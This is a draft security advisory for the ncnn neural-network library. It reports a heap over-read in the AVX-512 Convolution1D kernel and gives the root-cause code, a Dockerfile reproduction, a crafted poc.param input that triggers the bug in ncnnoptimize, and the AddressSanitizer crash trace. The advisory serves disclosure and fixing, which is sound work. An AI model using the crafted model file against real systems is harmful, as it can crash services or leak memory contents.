All advisories
Draft

AVX512 Heap Over-Read in Convolution1D

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

AVX512 Heap Over-Read in Convolution1D

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/convolution1d_packed.h:2663 in convolution1d_packed
Sanitizer verdict: unknown-crash

Summary

A Convolution1D layer whose declared weight_data_size is far smaller than its input geometry requires causes the x86 packed kernel to walk a 64-byte AVX-512 vector load off the end of the transformed weight buffer, terminating ncnnoptimize and mixing adjacent heap bytes into the convolution accumulator. The attacker supplies the .param file (which fixes both the input height and the weight count) and a matching one-float .bin. The over-read happens during ModelWriter::shape_inference(), the pass ncnnoptimize always runs after Net::load_model.

Detail

Convolution1D::load_param takes weight_data_size from parameter key 6 and Convolution1D::load_model allocates precisely that many floats. Convolution1D_x86::create_pipeline then derives the channel count from that attacker-controlled size rather than validating it:

// src/layer/x86/convolution1d_x86.cpp:47
    int num_input = weight_data_size / kernel_w / num_output;

    convolution1d_transform_kernel_packed(weight_data, weight_data_tm, num_input, num_output, kernel_w);

convolution1d_transform_kernel_packed sizes the repacked kernel from that num_input (inh), so a tiny weight_data_size yields a tiny weight_data_tm:

// src/layer/x86/convolution1d_packed.h:110
            kernel_tm.create(kernel_w, inh, outh);

At inference time, however, the loop bound is recomputed from the input blob, not from the weights. convolution1d_packed sets const int inh = bottom_blob.h * elempack; (line 1062) and iterates 16 rows at a time, advancing kptr by 16 floats on every kernel tap:

// src/layer/x86/convolution1d_packed.h:2660
                    for (int k = 0; k < kernel_w; k++)
                    {
                        __m512 _r0 = combine8x2_ps(_mm256_load_ps(r0), _mm256_load_ps(r1));
                        __m512 _w = _mm512_load_ps(kptr);
                        _sum_avx512 = _mm512_fmadd_ps(_r0, _w, _sum_avx512);

                        r0 += dilation_w * 8;
                        r1 += dilation_w * 8;
                        kptr += 16;
                    }

The PoC declares Input data 0 1 data 0=1 1=1000 and Convolution1D conv 1 1 data out 0=1 1=1 2=1 3=1 5=0 6=1: num_output=1, kernel_w=1, weight_data_size=1. num_input therefore computes to 1 / 1 / 1 == 1, and kernel_tm.create(1, 1, 1) yields ncnn's 84-byte minimum allocation. In the forward pass the input's 1000 rows pack as h = 125, elempack = 8, so inh = 1000 and the q + 15 < inh loop runs 62 times. The first iteration reads kptr[0..15] (bytes 0-63, still inside the 84-byte block); the second iteration reads from byte offset 64 and runs to byte 127, which is where AddressSanitizer catches the 64-byte read one byte past the end of the 84-byte region.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-avx512-heap-over-read-in-convolution1d && cd ncnn-poc-avx512-heap-over-read-in-convolution1d

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=1 1=1000
Convolution1D conv 1 1 data out 0=1 1=1 2=1 3=1 5=0 6=1
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

=================================================================
==1==ERROR: AddressSanitizer: unknown-crash on address 0x50e000000140 at pc 0x63a806b20381 bp 0x7ffc62c66270 sp 0x7ffc62c66260
READ of size 64 at 0x50e000000140 thread T0
    #0 0x63a806b20380 in _mm512_load_ps(void const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:431
    #1 0x63a806b20380 in convolution1d_packed /ncnn/src/layer/x86/convolution1d_packed.h:2663
    #2 0x63a806baf40f in ncnn::Convolution1D_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/convolution1d_x86_avx512.cpp:106
    #3 0x63a7fe3d1f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #4 0x63a7fe3c3b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #5 0x63a7fe4239e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #6 0x63a7fe2b53c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #7 0x63a7fe332eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #8 0x73218362c1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x73218362c28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x63a7fe2b2624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000154 is located 0 bytes after 84-byte region [0x50e000000100,0x50e000000154)
allocated by thread T0 here:
    #0 0x732183ca5f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x63a7fe38392d in fastMalloc /ncnn/src/allocator.h:62
    #2 0x63a7fe38392d in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
    #3 0x63a806aca951 in convolution1d_transform_kernel_packed /ncnn/src/layer/x86/convolution1d_packed.h:110
    #4 0x63a806bae330 in ncnn::Convolution1D_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/convolution1d_x86_avx512.cpp:49
    #5 0x63a7fe41ec96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
    #6 0x63a7fe332c34 in main /ncnn/tools/ncnnoptimize.cpp:2793
    #7 0x73218362c1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x73218362c28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x63a7fe2b2624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: unknown-crash /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:431 in _mm512_load_ps(void const*)

Credit

Zheng Yu @ DepthFirst